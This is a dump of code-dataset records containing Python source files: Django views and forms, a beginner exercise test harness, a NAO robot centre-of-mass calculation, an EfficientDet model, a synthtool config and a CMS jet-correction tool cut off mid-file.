'add.html')\n\n@login_required\ndef delete(request, id):\n if request.method == 'DELETE':\n entry = get_object_or_404(Todo, id=id)\n entry.delete()\n\n return HttpResponseRedirect('/todos')\n","sub_path":"todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"248962119","text":"# Don't forget to change the module to import\nfrom affichage_mot_texte import mon_programme\nimport sys\nimport 
io\n\n\n# list of input/output pairs\ninput_output=[\\\n(\"mathématiques\",\"mathématiques\"),\\\n(\"Deux mots\",\"Deux\\nmots\"),\\\n(\"maths info python exposant alpha fonction parabole equilateral orthogonal cercle isocèle\",\"maths\\ninfo\\npython\\nexposant\\nalpha\\nfonction\\nparabole\\nequilateral\\northogonal\\ncercle\\nisocèle\") \\\n]\n\n\n# help message if needed (renamed from help to avoid shadowing the builtin)\nhelp_msg=\"\"\n\n\n\ndef send_msg(channel, msg):\n print(\"TECHIO> message --channel \\\"{}\\\" \\\"{}\\\"\".format(channel, msg))\n\n\ndef success():\n send_msg(\"Tests validés\",\"Bravo !\")\n print(\"TECHIO> success true\")\n\n\ndef fail():\n print(\"TECHIO> success false\")\n \n\ndef test():\n try:\n for inp,outp in input_output:\n sauvegarde_stdout=sys.stdout\n sys.stdout=io.StringIO()\n mon_programme(inp)\n count1 = sys.stdout.getvalue()[:-1]\n sys.stdout=sauvegarde_stdout\n assert str(count1) == str(outp), \"En testant les valeurs '{}' le résultat obtenu est {} au lieu de {}\".format(str(inp),repr(str(count1)),repr(str(outp)))\n send_msg(\"Tests validés\",\"En testant les valeurs '{}' le résultat obtenu est bien :\".format(str(inp)))\n for mot in inp.split():\n send_msg(\"Tests validés\", mot )\n success()\n except AssertionError as e:\n fail()\n send_msg(\"Oops! \", e)\n if help_msg:\n send_msg(\"Aide 💡\", help_msg)\n\n\nif __name__ == \"__main__\": test()\n","sub_path":"python-project/Les_listes/affichage_mot_texte_Test.py","file_name":"affichage_mot_texte_Test.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"632360883","text":"# -*- coding: utf-8 -*-\nimport logging\nlog = logging.getLogger('shop.forms.shipping')\nfrom django import forms\nfrom django.utils.encoding import smart_unicode\nfrom cc.conf import coresettings\nfrom cc.core.middleware.user import get_current_user\nfrom cc.shop.middleware.checkout import get_current_address\nfrom cc.shop.middleware.basket import get_current_basket\nfrom cc.shop.models import CustomerAddress, PostageMethod\n\nclass PostageMethodForm(forms.Form):\n postage = forms.ModelChoiceField(PostageMethod.objects.none(), widget = forms.RadioSelect, required=True)\n \n def __init__(self, *args, **kwargs):\n try:\n self.address = kwargs.pop('address')\n except KeyError:\n self.address = False\n \n super(PostageMethodForm, self).__init__(*args, **kwargs)\n self.fields['postage'].queryset = PostageMethod.objects.all()\n \n def estimate_shipping(self):\n user = get_current_user()\n basket = get_current_basket()\n address = self.address or get_current_address()\n postage_methods = PostageMethod.objects.estimates(user, address)\n choices = []\n available_methods = []\n for s in postage_methods:\n estimate = s.method.model_class().estimate(s, basket, address)\n if estimate is not None:\n available_methods.append({'id' : s.id, 'title' : s.title, 'estimate' : estimate , 'description' : s.description})\n # sort according to price\n decorated_list = [(x['estimate'],x) for x in available_methods]\n decorated_list.sort()\n available_methods = [y for (x,y) in decorated_list]\n if len(available_methods) == 0 :\n available_methods.append({'id' : 0, 'title' : \"Standard Postage\", 'estimate' : coresettings.DEFAULT_POSTAGE_CHARGE , 'description' : \"Standard Postage\"})\n # return it all into one nice easy digestible choice\n for method in available_methods:\n choice = (method['id'], '%s%s : %s - %s' % (smart_unicode('£'), method['estimate'], method['title'], method['description']) )\r\n 
choices.append(choice)\n # \n self.fields['postage'].choices = choices\n return available_methods\n\n ","sub_path":"cc/shop/forms/postage.py","file_name":"postage.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183003029","text":"import numpy as np\nfrom LowerHalfTrans import lowerHalfComTrans\nfrom UpperHalfTrans import UpperHalfComTrans\nfrom convertCod import *\ndef calcCom(ThetaL, ThetaU):\n #center of mass of different parts in local coordinates\n #reference http://doc.aldebaran.com/2-1/family/nao_h25/masses_h25_v4.html#h25-masses-v4\n ComTorso = np.array([-0.00413, 0, 0.04342])\n MTorso = 1.0496\n ComNeck = np.array([-10**(-5), 0, -0.02742])\n MNeck = 0.06442\n ComHead = np.array([-0.00112, 0, 0.05258])\n MHead = 0.60533\n ComRShoulder = np.array([-0.00165, 0.02663,0.00014])\n MRShoulder = 0.07504\n ComLShoulder = np.array([-0.00165, -0.02663,0.00014])\n MLShoulder = 0.07504\n ComRBiceps = np.array([0.02455, -0.00563, 0.0033])\n MRBiceps = 0.15777\n ComLBiceps = np.array([0.02455, 0.00563, 0.0033])\n MLBiceps = 0.15777\n ComRElbow = np.array([-0.02744, 0, -0.00014])\n MRElbow = 0.06483\n ComLElbow = np.array([-0.02744, 0, -0.00014])\n MLElbow = 0.06483\n ComRForeArm = np.array([0.02556, -0.00281, 0.00076])\n MRForeArm = 0.07761\n ComLForeArm = np.array([0.02556, 0.00281, 0.00076])\n MLForeArm = 0.07761\n ComRHand = np.array([0.03434, 0.00088, 0.00308])\n MRHand = 0.18533\n ComLHand = np.array([0.03434, -0.00088, 0.00308])\n MLHand = 0.18533\n ComRPelvis = np.array([-0.00781, 0.01114, 0.02661])\n MRPelvis = 0.06981\n ComLPelvis = np.array([-0.00781, -0.01114, 0.02661])\n MLPelvis = 0.06981\n ComRHip = np.array([-0.01549, -0.00029, -0.00515])\n MRHip = 0.13053\n ComLHip = np.array([-0.01549, 0.00029, -0.00515])\n MLHip = 0.13053\n ComRThigh = np.array([0.00138, -0.00221, -0.05373])\n MRThigh = 0.38968\n ComLThigh = np.array([0.00138, 0.00221, -0.05373])\n MLThigh = 0.38968\n ComRTibia = np.array([0.00453, -0.00225,-0.04936])\n MRTibia = 0.29142\n ComLTibia = np.array([0.00453, 0.00225,-0.04936])\n MLTibia = 0.29142\n ComRAnkle = np.array([0.00045, -0.00029, 0.00685])\n MRAnkle = 0.13416\n ComLAnkle = np.array([0.00045, 0.00029, 0.00685])\n MLAnkle = 0.13416\n ComRFeet = np.array([0.02542, -0.0033, -0.03239])\n MRFeet = 0.16184\n ComLFeet = np.array([0.02542, 0.0033, -0.03239])\n MLFeet = 0.16184\n\n #***************************************************8\n #Joint location\n JTorso = np.array([0,0,0])\n JHead = np.array([0,0,126.5])\n JLShoulder = np.array([0, 98, 100])\n JRShoulder = np.array([0,-98, 100])\n JLElbow = np.array([105, 15, 0]) + JLShoulder\n JRElbow = np.array([105, -15, 0]) + JRShoulder\n JLHand = np.array([55.95, 0, 0]) + JLElbow\n JRHand = np.array([55.95, 0, 0]) + JRElbow\n JLHip = np.array([0, 50, -85])\n JRHip = np.array([0,-50, -85])\n JLKnee = np.array([0, 0, -100]) + JLHip\n JRKnee = np.array([0, 0, -100]) + JRHip\n JLAnkle = np.array([0, 0, -102.9]) + JLKnee\n JRAnkle = np.array([0, 0, -102.9]) + JRKnee\n\n #Com of Upper body\n MU = MTorso + MNeck + MHead + MLShoulder + MRShoulder + MLBiceps + MRBiceps + MLElbow + MRElbow \\\n + MLForeArm + MRForeArm + MLHand + MRHand\n\n x = np.array([ComTorso+JTorso, ComNeck+JHead, ComHead+JHead, ComLShoulder+JTorso,\n ComRShoulder+JTorso, ComLBiceps + JLShoulder, ComRBiceps + JRShoulder,\n ComLElbow + JLShoulder, ComRElbow+JRShoulder, ComLForeArm + JLShoulder,\n ComRForeArm + JRShoulder, ComLHand + JLHand, ComRHand+JRHand,\n 
JLShoulder, JRShoulder, JLElbow, JRElbow])\n\n for i in range(np.size(x,0)):\n x[i] = convCod2book(x[i])\n\n x = UpperHalfComTrans(x, ThetaU)\n for i in range(np.size(x,0)):\n x[i] = convCod2doc(x[i])\n\n\n #fix upper body\n if 0:\n ComU = (ComTorso+JTorso)*MTorso/MU + (ComNeck + JHead)*MNeck/MU \\\n + (ComHead + JHead)*MHead/MU + (ComLShoulder + JTorso)*MLShoulder/MU \\\n + (ComRShoulder + JTorso)*MRShoulder/MU + (ComLBiceps + JLShoulder)*MLBiceps/MU \\\n + (ComRBiceps + JRShoulder)*MRBiceps/MU + (ComLElbow + JLShoulder)*MLElbow/MU \\\n + (ComRElbow + JRShoulder)*MRElbow/MU + (ComLForeArm + JLShoulder)*MLForeArm/MU \\\n + (ComRForeArm + JRShoulder)*MRForeArm/MU + (ComLHand + JLHand)*MLHand/MU \\\n +(ComRHand + JRHand)*MRHand/MU\n else:\n ComU = x[0]*MTorso/MU + x[1]*MNeck/MU \\\n + x[2]*MHead/MU + x[3]*MLShoulder/MU \\\n + x[4]*MRShoulder/MU + x[5]*MLBiceps/MU \\\n + x[6]*MRBiceps/MU + x[7]*MLElbow/MU \\\n + x[8]*MRElbow/MU + x[9]*MLForeArm/MU \\\n + x[10]*MRForeArm/MU + x[11]*MLHand/MU \\\n + x[12]*MRHand/MU\n\n print('Com of upper body: ', ComU)\n MU = np.array([MU])\n\n #Com of lower half\n ML = MLPelvis + MRPelvis + MLHip + MRHip + MLThigh + MRThigh + MLTibia + MRTibia + MLAnkle + MRAnkle\\\n + MLFeet + MRFeet\n\n #ComL = (ComLPelvis + JLHip)*MLPelvis/ML + (ComRPelvis + JRHip)*MRPelvis/ML\\\n #+(ComLHip + JLHip)*MLHip/ML + (ComRHip + JRHip)*MRHip/ML + (ComLThigh + JLHip)*MLThigh/ML \\\n #+(ComRThigh + JRHip)*MRThigh/ML + (ComLTibia + JLKnee)*MLTibia/ML + (ComRTibia + JRKnee)*MRTibia/ML \\\n #+(ComLAnkle + JLKnee)*MLAnkle/ML + (ComRAnkle + JRKnee)*MRAnkle/ML + (ComLFeet + JLAnkle)*MLFeet/ML \\\n #+(ComRFeet + JRAnkle)*MRFeet/ML\n\n #x[0]:RPelvis, x[1]:LPelvis, x[2]:RHip, x[3]:LHip,x[4]:RThigh, x[5]:LThigh --> Hip\n #x[6]:RTibia, x[7]:LTibia, x[8]:RAnkle, x[9]:LAnkle --> Knee\n #x[10]:RFoot, x[11]:LFoot --> Ankle (Knee instead for convenience)\n #x[12] --> x1(LHip), x[13] --> x2(RKnee), x[14] --> x3(LKnee)\n x = np.array([ComRPelvis + JRHip, ComLPelvis + JLHip, ComRHip + JRHip, ComLHip + JLHip, ComRThigh + JRHip \\\n , ComLThigh + JLHip, ComRTibia + JRKnee, ComLTibia + JLKnee, ComRAnkle + JRKnee, \\\n ComLAnkle + JLKnee, ComRFeet + JRAnkle, ComLFeet + JLAnkle, JLHip, JRKnee, JLKnee])\n\n for i in range(np.size(x,0)):\n x[i] = convCod2book(x[i])\n\n x = lowerHalfComTrans(x, ThetaL)\n for i in range(np.size(x,0)):\n x[i] = convCod2doc(x[i])\n\n\n ComL = x[1]*MLPelvis/ML + x[0]*MRPelvis/ML\\\n +x[3]*MLHip/ML + x[2]*MRHip/ML + x[5]*MLThigh/ML \\\n +x[4]*MRThigh/ML + x[7]*MLTibia/ML + x[6]*MRTibia/ML \\\n +x[9]*MLAnkle/ML + x[8]*MRAnkle/ML + x[11]*MLFeet/ML \\\n +x[10]*MRFeet/ML\n\n M = ML + MU\n Com = ComU*MU/M + ComL*ML/M\n\n return np.concatenate((Com,M))\n\n#test function\n#a = calcCom(np.array([0,0,0,0,0,0]), np.array([0,0,0,0,0,0]))\n#print(a)\n\n\n","sub_path":"nao_virtual_ws/src/nao_virtual/nao_control/scripts/calcCoM.py","file_name":"calcCoM.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581375403","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom copy import deepcopy\nfrom typing import Any, Dict, List, Optional\n\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\n\nfrom combustion.nn import BiFPN1d, BiFPN2d, BiFPN3d, MatchShapes, MobileNetBlockConfig\n\nfrom .efficientnet import _EfficientNet\n\n\nclass _EfficientDetMeta(type):\n def __new__(cls, name, bases, dct):\n x = super().__new__(cls, name, bases, dct)\n if \"3d\" in name:\n x.Conv = nn.Conv3d\n x.BatchNorm = 
nn.BatchNorm3d\n x.BiFPN = BiFPN3d\n x._get_blocks = MobileNetBlockConfig.get_3d_blocks\n elif \"2d\" in name:\n x.Conv = nn.Conv2d\n x.BatchNorm = nn.BatchNorm2d\n x.BiFPN = BiFPN2d\n x._get_blocks = MobileNetBlockConfig.get_2d_blocks\n elif \"1d\" in name:\n x.Conv = nn.Conv1d\n x.BatchNorm = nn.BatchNorm1d\n x.BiFPN = BiFPN1d\n x._get_blocks = MobileNetBlockConfig.get_1d_blocks\n else:\n raise RuntimeError(f\"Metaclass: error processing name {name}\")\n return x\n\n\nclass _EfficientDet(_EfficientNet):\n __constants__ = [\"fpn_levels\"]\n\n def __init__(\n self,\n block_configs: List[MobileNetBlockConfig],\n fpn_levels: List[int] = [3, 5, 7, 8, 9],\n fpn_filters: int = 64,\n fpn_repeats: int = 3,\n width_coeff: float = 1.0,\n depth_coeff: float = 1.0,\n width_divisor: float = 8.0,\n min_width: Optional[int] = None,\n stem: Optional[nn.Module] = None,\n head: Optional[nn.Module] = None,\n fpn_kwargs: dict = {},\n ):\n super(_EfficientDet, self).__init__(\n block_configs, width_coeff, depth_coeff, width_divisor, min_width, stem, head\n )\n self.fpn_levels = fpn_levels\n\n # convolutions mapping backbone feature maps to constant number of channels\n fpn_convs = []\n output_filters = self.round_filters(fpn_filters, 1.0, width_divisor, min_width)\n self.__fpn_filters = output_filters\n for i, config in enumerate(self.block_configs):\n if i + 1 in fpn_levels:\n input_filters = config.output_filters\n conv = self.Conv(input_filters, output_filters, kernel_size=1)\n fpn_convs.append(conv)\n\n for i in fpn_levels:\n if i == len(self.block_configs) + 1:\n input_filters = self.block_configs[-1].output_filters\n conv = self.Conv(input_filters, output_filters, kernel_size=3, stride=2, padding=1)\n fpn_convs.append(conv)\n elif i > len(self.block_configs) + 1:\n input_filters = output_filters\n conv = self.Conv(input_filters, output_filters, kernel_size=3, stride=2, padding=1)\n fpn_convs.append(nn.Sequential(nn.ReLU(), conv))\n\n self.fpn_convs = nn.ModuleList(fpn_convs)\n\n self.match = MatchShapes()\n\n # defaults for batch norm params\n _ = {\"bn_momentum\": 0.01, \"bn_epsilon\": 1e-3}\n _.update(fpn_kwargs)\n fpn_kwargs = _\n\n # build bifpn\n bifpn_layers = []\n for i in range(fpn_repeats):\n bifpn = self.BiFPN(output_filters, levels=len(fpn_levels), **fpn_kwargs)\n bifpn_layers.append(bifpn)\n self.bifpn_layers = nn.ModuleList(bifpn_layers)\n\n @torch.jit.unused\n @property\n def fpn_filters(self) -> int:\n r\"\"\"Number of filters in each level of the BiFPN. 
When using a custom head, use this\n property to determine the number of filters in the head's input.\n \"\"\"\n return self.__fpn_filters\n\n def extract_features(self, inputs: Tensor) -> List[Tensor]:\n r\"\"\"Runs the EfficientDet stem and body to extract features, returning a list of\n tensors representing features extracted from each block.\n\n Args:\n\n inputs (:class:`torch.Tensor`):\n Model inputs\n\n \"\"\"\n # efficientnet feature extractor\n backbone_features: List[Tensor] = []\n x = self.stem(inputs)\n prev_x = x\n for block in self.blocks:\n x = block(prev_x)\n backbone_features.append(x)\n prev_x = x\n\n # pull out feature maps to be used in BiFPN\n captured_features: List[Tensor] = []\n\n for i in self.fpn_levels:\n if i - 1 < len(backbone_features):\n captured_features.append(backbone_features[i - 1])\n\n # map to constant channel number using trivial convs\n for i, conv in enumerate(self.fpn_convs):\n if i < len(captured_features):\n captured_features[i] = conv(captured_features[i])\n else:\n prev_x = conv(prev_x)\n captured_features.append(prev_x)\n\n for bifpn in self.bifpn_layers:\n captured_features = bifpn(captured_features)\n\n return captured_features\n\n def forward(self, inputs: Tensor) -> List[Tensor]:\n r\"\"\"Runs the entire EfficientDet model, including stem, body, and head.\n If no head was supplied, the output of :func:`extract_features` will be returned.\n Otherwise, the output of the given head will be returned.\n\n .. note::\n The returned output will always be a list of tensors. If a custom head is given\n and it returns a single tensor, that tensor will be wrapped in a list before\n being returned.\n\n Args:\n inputs (:class:`torch.Tensor`):\n Model inputs\n \"\"\"\n output = self.extract_features(inputs)\n if self.head is not None:\n output = self.head(output)\n if not isinstance(output, list):\n output = [\n output,\n ]\n\n return output\n\n @classmethod\n def from_predefined(cls, compound_coeff: int, block_overrides: Dict[str, Any] = {}, **kwargs) -> \"_EfficientDet\":\n r\"\"\"Creates an EfficientDet model using one of the parameterizations defined in the\n `EfficientDet paper`_.\n\n Args:\n compound_coeff (int):\n Compound scaling parameter :math:`\\phi`. For example, to construct EfficientDet-D0, set\n ``compound_coeff=0``.\n\n block_overrides (dict):\n Overrides to be applied to each :class:`combustion.nn.MobileNetBlockConfig`.\n\n **kwargs:\n Additional parameters/overrides for model constructor.\n\n .. 
_EfficientDet paper:\n https://arxiv.org/abs/1911.09070\n \"\"\"\n # from paper\n alpha = 1.2\n beta = 1.1\n width_divisor = 8.0\n\n depth_coeff = alpha ** compound_coeff\n width_coeff = beta ** compound_coeff\n\n fpn_filters = int(64 * 1.35 ** compound_coeff)\n fpn_repeats = 3 + compound_coeff\n fpn_levels = [3, 5, 7, 8, 9]\n\n # apply config overrides at each block\n block_configs = deepcopy(cls.DEFAULT_BLOCKS)\n for k, v in block_overrides.items():\n for config in block_configs:\n setattr(config, str(k), v)\n\n final_kwargs = {\n \"block_configs\": block_configs,\n \"width_coeff\": width_coeff,\n \"depth_coeff\": depth_coeff,\n \"width_divisor\": width_divisor,\n \"fpn_filters\": fpn_filters,\n \"fpn_repeats\": fpn_repeats,\n \"fpn_levels\": fpn_levels,\n }\n final_kwargs.update(kwargs)\n result = cls(**final_kwargs)\n result.compound_coeff = compound_coeff\n return result\n\n\nclass EfficientDet1d(_EfficientDet, metaclass=_EfficientDetMeta):\n pass\n\n\nclass EfficientDet2d(_EfficientDet, metaclass=_EfficientDetMeta):\n r\"\"\"Implementation of EfficientDet as described in the `EfficientDet paper`_.\n EfficientDet is built on an EfficientNet backbone\n (see :class:`combustion.models.EfficientNet2d` for details). EfficientDet adds a\n bidirectional feature pyramid network (see :class:`combustion.nn.BiFPN2d`), which\n mixes information across the various feature maps produced by the EfficientNet backbone.\n\n .. image:: ./efficientdet.png\n :width: 800px\n :align: center\n :height: 300px\n :alt: Diagram of EfficientDet\n\n The authors of EfficientDet used the default EfficientNet scaling parameters for the backbone:\n\n .. math::\n \\alpha = 1.2 \\\\\n \\beta = 1.1 \\\\\n \\gamma = 1.15\n\n\n The BiFPN was scaled as follows:\n\n .. math::\n W_\\text{bifpn} = 64 \\cdot \\big(1.35^\\phi\\big) \\\\\n D_\\text{bifpn} = 3 + \\phi\n\n In the original EfficientDet implementation, the authors extract feature maps from levels\n 3, 5, and 7 of the backbone. Two additional coarse levels are created by performing additional\n strided convolutions to the final level in the backbone, for a total of 5 levels in the BiFPN.\n\n .. note::\n Currently, DropConnect ratios are not scaled based on depth of the given block.\n This is a deviation from the true EfficientNet implementation.\n\n Args:\n block_configs (list of :class:`combustion.nn.MobileNetBlockConfig`)\n Configs for each of the :class:`combustion.nn.MobileNetConvBlock2d` blocks\n used in the model.\n\n fpn_levels (list of ints):\n Indices of EfficientNet feature levels to include in the BiFPN, starting at index 1.\n Values in ``fpn_levels`` greater than the total number of blocks in the backbone denote\n levels that should be created by applying additional strided convolutions to the final\n level in the backbone.\n\n fpn_filters (int):\n Number of filters to use for the BiFPN. The filter count given here should be the desired\n number of filters after width scaling.\n\n fpn_repeats (int):\n Number of repeats to use for the BiFPN. The repeat count given here should be the desired\n number of repeats after depth scaling.\n\n width_coeff (float):\n The width scaling coefficient. Increasing this increases the width of the model.\n\n depth_coeff (float):\n The depth scaling coefficient. Increasing this increases the depth of the model.\n\n width_divisor (float):\n Used in calculating number of filters under width scaling. 
Filters at each block\n will be a multiple of ``width_divisor``.\n\n min_width (int):\n The minimum width of the model at any block\n\n stem (:class:`torch.nn.Module`):\n An optional stem to use for the model. The default stem is a single\n 3x3/2 convolution that expects 3 input channels.\n\n head (:class:`torch.nn.Module`):\n An optional head to use for the model. By default, no head will be used\n and ``forward`` will return a list of tensors containing extracted features.\n\n fpn_kwargs (dict):\n Keyword args to be passed to all :class:`combustion.nn.BiFPN2d` layers.\n\n Shapes\n * Input: :math:`(N, C, H, W)`\n * Output: List of tensors of shape :math:`(N, C, H', W')`, where height and width vary\n depending on the amount of downsampling for that feature map.\n\n .. _EfficientDet paper:\n https://arxiv.org/abs/1911.09070\n \"\"\"\n\n\nclass EfficientDet3d(_EfficientDet, metaclass=_EfficientDetMeta):\n pass\n","sub_path":"src/combustion/models/efficientdet.py","file_name":"efficientdet.py","file_ext":"py","file_size_in_byte":11419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"316820532","text":"import synthtool as s\nimport synthtool.gcp as gcp\nimport synthtool.languages.node as node\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nAUTOSYNTH_MULTIPLE_COMMITS = True\n\n\ngapic = gcp.GAPICBazel()\nversions = ['v1', 'v1beta2']\nfor version in versions:\n library = gapic.node_library(\n 'language',\n version,\n )\n s.copy(\n library,\n excludes=['package.json', 'README.md'])\n\n# Update common templates\ncommon_templates = gcp.CommonTemplates()\ntemplates = common_templates.node_library(\n source_location='build/src', versions=versions, default_version='v1')\ns.copy(templates)\n\nnode.postprocess_gapic_library()\n","sub_path":"synth.py","file_name":"synth.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"447087706","text":"# Author: Izaak Neutelings (May 2018)\n# Adapted from\n# nanoAOD-tools/python/postprocessing/modules/jme/jetmetUncertainties.py\n# https://github.com/cms-nanoAOD/nanoAOD-tools/blob/master/python/postprocessing/modules/jme/jetmetUncertainties.py\n# https://github.com/cms-nanoAOD/nanoAOD-tools/blob/master/python/postprocessing/modules/jme/jetRecalib.py (data)\nfrom corrections import modulepath, ensureFile\nfrom ROOT import gSystem, TLorentzVector, vector, JetCorrectorParameters, JetCorrectionUncertainty, FactorizedJetCorrector\nimport math, os, glob, tarfile, tempfile\nimport numpy as np\nfrom math import sqrt, atan2, cos, sin\nfrom JetCalibrationTool import JetReCalibrator\nfrom JetSmearingTool import JetSmearer\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object\nfrom PhysicsTools.NanoAODTools.postprocessing.tools import matchObjectCollection, matchObjectCollectionMultiple\npathJME = os.environ['CMSSW_BASE'] + \"/src/PhysicsTools/NanoAODTools/data/jme/\"\npathJME_local = modulepath+\"/jetMET/\"\n\n\n\ndef ensureJMEFiles(globalTag,path=None,tarbalpath=pathJME_local,JER=False):\n \"\"\"Helper function to ensure the JEC files are available in a given path. 
If not, look for a tar ball.\"\"\"\n # https://twiki.cern.ch/twiki/bin/view/CMS/JECDataMC\n # https://github.com/cms-jet/JECDatabase/raw/master/tarballs/\n # https://twiki.cern.ch/twiki/bin/view/CMS/JetResolution\n # https://github.com/cms-jet/JRDatabase/tree/master/textFiles/\n \n if path is None:\n path = os.path.join(tarbalpath,globalTag)\n \n # CHECK if txt files are already there\n if os.path.exists(path):\n if JER:\n files_sf_txt = glob.glob(os.path.join(path,globalTag+\"*_SF_*.txt\"))\n files_res_txt = glob.glob(os.path.join(path,globalTag+\"*Resolution_*.txt\"))\n if len(files_sf_txt)>=1 and len(files_res_txt)>=3:\n return path\n else:\n files_jes_txt = glob.glob(os.path.join(path,\"*_L[123]*.txt\"))\n files_unc_txt = glob.glob(os.path.join(path,\"*_Uncertainty*.txt\"))\n if len(files_jes_txt)>=6 and len(files_unc_txt)>=2:\n return path\n else:\n os.makedirs(path)\n \n # CHECK for tarball and extract to directory\n for ext in [\".tar.gz\",\".tgz\"]:\n files_tgz = glob.glob(os.path.join(tarbalpath+globalTag+ext))\n if len(files_tgz)>0:\n tarfilename = files_tgz[0]\n print(\"Extracting %s to %s...\"%(tarfilename,path))\n archive = tarfile.open(tarfilename, \"r:gz\")\n archive.extractall(path)\n return path\n \n #path_JEC = tempfile.mkdtemp()\n #jesArchive = tarfile.open(pathJME+globalTag+\".tgz\", \"r:gz\")\n #jesArchive.extractall(path_JEC)\n #return path_JEC\n \n url = \"https://github.com/cms-jet/JRDatabase/tree/master/textFiles/\" if JER else \"https://github.com/cms-jet/JECDatabase/raw/master/tarballs/\"\n raise OSError(\"ensureJMEFiles: did not find txt files or tarball for global tag in '%s'! Check %s\"%(globalTag,url))\n return None\n \n\n\nclass JetMETCorrectionTool:\n \"\"\"Class to apply jet/MET corrections on an event-by-event basis.\"\"\"\n \n def __init__(self, year, **kwargs):\n \n #--------------------------------------------------------------------------------------------\n # CV: globalTag and jetType not yet used, as there is no consistent set of txt files for\n # JES uncertainties and JER scale factors and uncertainties yet\n #--------------------------------------------------------------------------------------------\n \n globalTag = kwargs.get('globalTag', None )\n globalTag_JER = kwargs.get('globalTag_JER', None )\n globalTag_JES = kwargs.get('globalTag_JES', globalTag )\n jetType = kwargs.get('jet', 'AK4PFchs' )\n metType = kwargs.get('met', 'MET' )\n isData = kwargs.get('data', False )\n era = kwargs.get('era', \"\" ) # for data; A, B, C, D, ...\n redoJEC = kwargs.get('redoJEC', True )\n doJER = kwargs.get('smear', not isData ) and not isData\n doSystematics = kwargs.get('systematics', True ) and not isData\n noGroom = kwargs.get('noGroom', True )\n jesUncertainties = kwargs.get('uncertainties', ['Total'] if doSystematics else [ ] )\n updateEvent = kwargs.get('updateEvent', False ) # unreliable...\n correctSeparate = kwargs.get('correctSeparate', False )\n \n jetTypes = ['AK4PFchs','AK4PFPuppi','AK8PFchs','AK8PFPuppi']\n assert year in [2016,2017,2018], \"JetMETCorrectionTool: You must choose a year from: 2016, 2017, or 2018.\"\n assert jetType in jetTypes, \"JetMETCorrectionTool: You must choose a jet type from: %s\"%(', '.join(jetTypes))\n assert all(u in ['Total','All'] for u in jesUncertainties), \"JetMETCorrectionTool: Given uncertainties are %s; must be 'Total' or 'All'!\"%(jesUncertainties)\n \n # TARGET VARIABLES\n if \"AK4\" in jetType:\n self.jetBranchName = 'Jet'\n self.genJetBranchName = 'GenJet'\n 
self.genSubJetBranchName = None\n self.doGroomed = False\n self.corrMET = True\n elif \"AK8\" in jetType:\n self.jetBranchName = 'FatJet'\n self.subJetBranchName = 'SubJet'\n self.genJetBranchName = 'GenJetAK8'\n self.genSubJetBranchName = 'SubGenJetAK8'\n self.doGroomed = not noGroom\n self.corrMET = False\n else:\n raise ValueError(\"ERROR: Invalid jet type = '%s'!\"%jetType)\n self.metBranchName = metType\n self.rhoBranchName = \"fixedGridRhoFastjetAll\"\n self.jmsVals = [1.00, 0.99, 1.01] # TODO: change to real values\n self.unclEnThreshold = 15. # energy threshold below which jets are considered as \"unclustered energy\"\n # cf. JetMETCorrections/Type1MET/python/correctionTermsPfMetType1Type2_cff.py\n jetSmearer = None\n jmr_vals = [ ]\n \n if isData:\n \n # GLOBAL TAG for JES\n if globalTag==None:\n if year==2016:\n for eraset in ['BCD','EF','GH']:\n if era in eraset: era = eraset\n globalTag = \"Summer16_07Aug2017_V11_DATA\"\n globalTag_JES = \"Summer16_07Aug2017%s_V11_DATA\"%era\n elif year==2017:\n if era in 'DE': era = 'DE'\n globalTag = \"Fall17_17Nov2017_V32_DATA\"\n globalTag_JES = \"Fall17_17Nov2017%s_V32_DATA\"%era\n else:\n era = \"Run\"+era\n globalTag = \"Autumn18_V8_DATA\"\n globalTag_JES = \"Autumn18_%s_V8_DATA\"%era\n \n else:\n \n # GLOBAL TAG for JES\n if globalTag==None:\n if year==2016:\n globalTag = \"Summer16_07Aug2017_V11_MC\" #\"Summer16_23Sep2016V4_MC\"\n elif year==2017:\n globalTag = \"Fall17_17Nov2017_V32_MC\"\n else:\n globalTag = \"Autumn18_V8_MC\"\n globalTag_JES = globalTag\n \n # GLOBAL TAG for JER\n if globalTag_JER==None:\n if year==2016:\n globalTag_JER = \"Summer16_25nsV1_MC\"\n elif year==2017:\n globalTag_JER = \"Fall17_V3_MC\"\n elif year==2018:\n globalTag_JER = \"Autumn18_V1_MC\"\n \n # JERs: https://twiki.cern.ch/twiki/bin/view/CMS/JetWtagging\n if year==2016 or year==2018: #update when 2018 values available\n jmr_vals = [1.00, 1.20, 0.80] # nominal, up, down\n else:\n jmr_vals = [1.09, 1.14, 1.04]\n \n # READ JER uncertainties\n ###if doJER:\n jetSmearer = JetSmearer(globalTag_JER,jetType,systematics=doSystematics,jmr_vals=jmr_vals)\n \n # READ JES\n path_JES = ensureJMEFiles(globalTag)\n \n # REDO JECs\n if redoJEC:\n jetReCalibrator = JetReCalibrator(globalTag_JES,jetType,True,path=path_JES,\n correctSeparate=correctSeparate,correctType1MET=False)\n else:\n jetReCalibrator = None\n \n # LOAD LIBRARIES for accessing JES scale factors and uncertainties from txt files\n for library in [ \"libCondFormatsJetMETObjects\", \"libPhysicsToolsNanoAODTools\" ]:\n if library not in gSystem.GetLibraries():\n print(\"Load Library '%s'\"%library.replace(\"lib\", \"\"))\n gSystem.Load(library)\n \n # READ UNCERTAINTY SOURCE NAMES from the loaded file\n jesUncertainty = { }\n filename_JES = \"\"\n if doSystematics:\n postfix = '' if jesUncertainties==['Total'] else \"Sources\"\n filename_JES = ensureFile(path_JES,\"%s_Uncertainty%s_%s.txt\"%(globalTag,postfix,jetType))\n if jesUncertainties==['All']:\n with open(path_JES+'/'+filename_JES) as 